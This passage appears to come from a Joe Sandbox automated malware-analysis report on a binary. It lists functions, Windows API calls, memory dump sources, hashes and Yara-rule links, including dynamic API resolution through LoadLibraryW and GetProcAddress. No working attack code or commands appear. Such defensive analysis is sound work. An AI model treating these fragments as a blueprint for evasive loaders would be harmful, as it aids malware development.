                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID: RS7m$RS{m
                                                                                          • API String ID: 959723449-144615663
                                                                                          • Opcode ID: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction ID: 49c320015e118afe2972b60d58b9919ac9ed7c6049a2ae7adeebcfd59ae4b10e
                                                                                          • Opcode Fuzzy Hash: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction Fuzzy Hash: 84C18370A052059FEB10DFA8CC80FADB7B9AF85304F104199EA49EF286DB71ED41CB50
                                                                                          Function 6D023690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3833040332-0
                                                                                          • Opcode ID: bf703b325c10b64de6a3f9c7a8bdb83519dd1c05de7a070f47a778a53f0df7b9
                                                                                          • Instruction ID: 3ecfe5cf2de1ca82ac0c54474c867a666062b2df61a055978929866f566b5a71
                                                                                          • Opcode Fuzzy Hash: bf703b325c10b64de6a3f9c7a8bdb83519dd1c05de7a070f47a778a53f0df7b9
                                                                                          • Instruction Fuzzy Hash: 62816AB1905219AFEF04DFA8C884FEEBBB9FF49304F15415DE905AB241DB34A905CBA0
                                                                                          Function 6D02D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D8EC
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D902
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D90D
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D929
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02D966
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D973
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02D9B4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D9C1
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02DA6F
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA80
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA87
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA99
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 1625659656-0
                                                                                          • Opcode ID: 0064272d1773bb3ea9e368995692c84c8b6b183c7943eceaf36fbc63040dd3ab
                                                                                          • Instruction ID: 6bbc7c2fa5c1f213a69c0392bedffd595448d62cb113c0f849d120b7b124a583
                                                                                          • Opcode Fuzzy Hash: 0064272d1773bb3ea9e368995692c84c8b6b183c7943eceaf36fbc63040dd3ab
                                                                                          • Instruction Fuzzy Hash: AA8135722093029FDB00CF68C884B5AB7F9FFC9715F048A5DE9959B240E774E905CBA2
                                                                                          Function 6D0112A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: e8b485be68b69c486f74dba17df8475e1a56833acbf12c56ff6280dff055c521
                                                                                          • Instruction ID: 3ac0ac8eb53a4a8117cb4af4fe9bf84c3ebd91027be7db096e9303e1426b3440
                                                                                          • Opcode Fuzzy Hash: e8b485be68b69c486f74dba17df8475e1a56833acbf12c56ff6280dff055c521
                                                                                          • Instruction Fuzzy Hash: 164108313086445BF718CEECEC80B5EB3AAEB95314760492EF591CBA45D770D845C7A3
                                                                                          Function 6D02CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD5C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD65
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD6B
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02CD76
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02CDAA
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CDB7
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02D2A5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2B5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2BB
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: a9c33c6d674cbcfd30f6751d2c05683de4216fd21650cd75ba4d6c19320705c4
                                                                                          • Instruction ID: 64e997b2183f42eb1b629d774d1b1f80e681e5f3ef628faf6e89f505b7ce8ca6
                                                                                          • Opcode Fuzzy Hash: a9c33c6d674cbcfd30f6751d2c05683de4216fd21650cd75ba4d6c19320705c4
                                                                                          • Instruction Fuzzy Hash: 0512F775A15706AFDB18DB94DD84DAAB3B9BF8D300F14466CF50A9BB91CA30F841CB90
                                                                                          Function 6D024BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BDC
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BE5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BEB
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024BF6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D024C2A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024C37
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D025107
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025117
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02511D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: b71fda4c422473647cdde964e4130ade02ebbc388914f52c6865368b4970e0d7
                                                                                          • Instruction ID: ea525bd4a71a885bcbaaa474e28947c171606a9a354ce46dae7c4ed870160e02
                                                                                          • Opcode Fuzzy Hash: b71fda4c422473647cdde964e4130ade02ebbc388914f52c6865368b4970e0d7
                                                                                          • Instruction Fuzzy Hash: 24120575605705AFDB18DB98DD84DBAB3B9BF8D300F144668F50AABB91CA30F841CB50
                                                                                          Function 6D01DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01DD00
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6D01DD10
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D022FFF,?), ref: 6D01DD47
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DD4F
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D022FFF,?), ref: 6D01DD6D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D01DDA4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DDAC
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DE16
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DE27
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DE31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                                                          • String ID:
                                                                                          • API String ID: 3525949229-0
                                                                                          • Opcode ID: 3401607c90895ae4b63b4bb25d2439a3e65a4891a0c92c6926707d75d1cae93d
                                                                                          • Instruction ID: 278af17abd05ba16144a829538b57906f985c1bc85c2571297dee88194ee07af
                                                                                          • Opcode Fuzzy Hash: 3401607c90895ae4b63b4bb25d2439a3e65a4891a0c92c6926707d75d1cae93d
                                                                                          • Instruction Fuzzy Hash: A1512C75A04609AFDB00DFA5C884FAFBBB9FF9A701F118119EA15A7350DB35D901CBA0
                                                                                          Function 6D03C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03C213
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                                                                          • API String ID: 1823113695-1254974138
                                                                                          • Opcode ID: dc4da0759ca437e8955150272eca4196757b09ed7154cb4650148eaa3b644cf6
                                                                                          • Instruction ID: 90b72e0ec00ca79ae9a6a12364e4552cd436a6c714be00c38a4815218a3f919a
                                                                                          • Opcode Fuzzy Hash: dc4da0759ca437e8955150272eca4196757b09ed7154cb4650148eaa3b644cf6
                                                                                          • Instruction Fuzzy Hash: F9918775A04609AFDB18CF59DC90FAEB7B9EB88304F05861DE959DB740D730BA04CB91
                                                                                          Function 6D010CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: bd0843d86aa01488bbe1dc38e607b41cbe752acfeea0eb7d3cde1a92a242e856
                                                                                          • Instruction ID: de36a59c5b074ec24aeeec1e2e933db4b919752fe7210431a4df79b04d963550
                                                                                          • Opcode Fuzzy Hash: bd0843d86aa01488bbe1dc38e607b41cbe752acfeea0eb7d3cde1a92a242e856
                                                                                          • Instruction Fuzzy Hash: 1051A33171C1059BE724CE9EEC80B5EB7EAEBC9354B20851EF895C7285DB70EC6087A1
                                                                                          Function 6D031B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D031C5E
                                                                                          • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D031C69
                                                                                          • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6D031CA2
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6D031CC1
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6D031CCC
                                                                                          • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6D031D0A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                          • String ID: User32.dll$kernel32.dll
                                                                                          • API String ID: 310444273-1965990335
                                                                                          • Opcode ID: aff2ddd6eaba22df1d67e8a58a85204b65dde009c37ac84cb150d105e8948b57
                                                                                          • Instruction ID: 4d083cd0e34172bb0b04a6b3b08c9201fa2a4044ed3d00be3be4b3e3a6a73cf4
                                                                                          • Opcode Fuzzy Hash: aff2ddd6eaba22df1d67e8a58a85204b65dde009c37ac84cb150d105e8948b57
                                                                                          • Instruction Fuzzy Hash: 56615274504A129FE720CF18C5C5B6BBBF6FF4A300F618958D5968BB42D736E846CB82
                                                                                          Function 6D074409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 6D07442E
                                                                                            • Part of subcall function 6D073FC9: Replicator::operator[].LIBCMT ref: 6D07404C
                                                                                            • Part of subcall function 6D073FC9: DName::operator+=.LIBCMT ref: 6D074054
                                                                                          • DName::operator+.LIBCMT ref: 6D074487
                                                                                          • DName::DName.LIBCMT ref: 6D0744DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                          • API String ID: 834187326-2211150622
                                                                                          • Opcode ID: f9b7ca5a585834d48e6d975f6ae25f77eeb0c8bad042c2fe88acb450bb0fea8c
                                                                                          • Instruction ID: 148ae46b637b8156c78601f85e944ae0287f70b7b7036cb6e01d57a1c57871e5
                                                                                          • Opcode Fuzzy Hash: f9b7ca5a585834d48e6d975f6ae25f77eeb0c8bad042c2fe88acb450bb0fea8c
                                                                                          • Instruction Fuzzy Hash: 62219DB4704509AFEF11CF68C450BA97BF4EB4A38AB098299E945CF217CB30D943DB58
                                                                                          Function 6D075D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • UnDecorator::UScore.LIBCMT ref: 6D075D40
                                                                                          • DName::DName.LIBCMT ref: 6D075D4C
                                                                                            • Part of subcall function 6D073B3B: DName::doPchar.LIBCMT ref: 6D073B6C
                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 6D075D8B
                                                                                          • DName::operator+=.LIBCMT ref: 6D075D95
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DA4
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DB0
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DBD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
